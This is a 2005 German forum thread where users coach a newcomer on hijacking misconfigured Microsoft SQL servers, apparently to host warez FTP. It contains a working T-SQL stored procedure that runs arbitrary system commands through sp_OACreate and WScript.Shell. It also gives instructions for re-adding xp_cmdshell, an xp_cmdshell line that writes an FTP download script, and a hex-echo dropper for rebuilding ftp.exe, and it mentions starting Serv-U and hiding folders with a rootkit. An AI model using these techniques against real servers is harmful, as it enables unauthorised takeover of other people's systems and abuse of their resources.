sql-errorz hacken

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von n00b123, 27. September 2005 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 27. September 2005
    hi all,
    könnt mir einer helfen beim hacken von sqlz mit sql_error
    ged auch per icq oder pn
    10er ist sicher
    danke
     
  2. 28. September 2005
    erst mal, gibt es verschiedene Arten des Errors, ihr müsst wissen woran es liegt!
    Habt ihr keine rechte auf der shell? Fehlt die Xplog70 oder Odsole70.dll? Is die shell gelöscht?
    Ihr müst wissen woher euer Fehler kommt um ihn zu fixen, so bringt es wenig wenn die xplog70.dll weg is ne neue shell zu erstellen^^
    Und falls irh ekiene rechte auch der master shell habt wirds sowieso schwer! Auch mit dem erstellen ner neuen Shell!

    Auf dein Prob zurück zu kommen! Wenn du ne neue shell erstellt hast musst du weiter mit sqlbrower arbeiten und net mit sqlexec oder so, da sqlexec auf die xp_cmdshell zugriefen will auf der du aber keine rechte hast! also musst du mit Sqlbrower auf deine neue shell zugreifen und so diene befehle ausführen!

    Gruss Sypher
     
  3. 28. September 2005
    letz get pro^^


    1.) xp_cmdshell adden mit addproc xp cmdshell oder so
    2.) mit nem script ...
    raw sql qry

    Code:
    CREATE PROCEDURE ok_test(@cmd varchar(255), @Wait int = 0) AS
    --Create WScript.Shell object
    DECLARE @result int, @OLEResult int, @RunResult int
    DECLARE @ShellID int
    
    EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
    IF @OLEResult <> 0 SELECT @result = @OLEResult
    IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)
    
    
    EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait
    IF @OLEResult <> 0 SELECT @result = @OLEResult
    IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)
    --If @OLEResult <> 0 EXEC sp_displayoaerrorinfo @ShellID, @OLEResult
    
    
    EXECUTE @OLEResult = sp_OADestroy @ShellID
    
    return @result
    3.) saying "hello" to mssql sever^^
    4.) mir scan geben...habe noch div.undokumentierte methoden
     
  4. 28. September 2005
    hmm...

    Also, ich ha jetzt mit sqlbrower eine shell erstellt.

    Wie nun weiter ?

    xp_cmdshell "echo open .............>>c:\...........txt"

    so dann die dateien holen ?

    Muss ich jede zeile wieder einzelnd eingeben wie bei sqlexec ?
     
  5. 28. September 2005
    markant erkannt
     
  6. 28. September 2005
    ok, aber wie weiß ich jetzt ob der befehl geklappt hat und wie starte ich dann serv-u ???
     
  7. 29. September 2005
    hm wenn du das nocht weißt fang an tuts zu lesen!

    Gruss Sypher
     
  8. 29. September 2005
    das mach ich schon ne ewigkeit, nur finde ich hier kein tut, dass mir den vorgang beschreibt, hier steht zwar drin wie ich die shell herstelle, aber wie es dann wirklich weitergeht, hab ich nicht gefunden.
     
  9. 29. September 2005
    du musst die befehle nacheinander eingeben .. kriegst dann meißt ne meldung sql no data oder sowas .. am ende führste die eigegebenen befehle aus und dann merkste schon obs gefunzt hat oder nicht ^^ aber das kann kurz dauewrn .. weil er ja oft files downloaden muss .. also einfach dann kurz abwarten ...

    die befehle selber stehn ja in den tuts und serv - u starten ^^ da kann man doch net viel falsch machen .. ich glaub echt du solltest das tut mal genau lesen gibt 2 oder 3 gute hier im board ...
     
  10. 29. September 2005
    mit sqlexec ist das ja alle kein porblem, nur geht es ja gerade um sqlbrowser bzw. sql errors hacken, und da gehen ja Befehle wie dir c:\ nicht, deshalb weis ich nicht, ob es geklappt hat.

    Und wie erstellt ich die gelöschten Daten wie die ftp.exe ?
     
  11. 29. September 2005
    ECHO @ECHO OFF^>1>ftp.bat
    ECHO echo e 0100 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00^>^>1>>ftp.bat
    ECHO echo e 0110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00^>^>1>>ftp.bat
    ECHO echo e 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00^>^>1>>ftp.bat
    ECHO echo e 0130 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00^>^>1>>ftp.bat
    ..........
    .....
    .....
    ...
    ich glaube aber kaum, dass du 1000 zeilen mit solchen code wirklich ausführen willst nur um die ftp.exe wieder herzustellen.
     
  12. 29. September 2005
    ich glaub ich hab jetzt nen geeigneten server gefunden, secured hab ich ihn auch, nur noch ne Frage...

    Kann ich auf dem FTP auch Ordner verstecken ?

    EDIT: OK, es geht nur mit rootkit...
     
  13. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.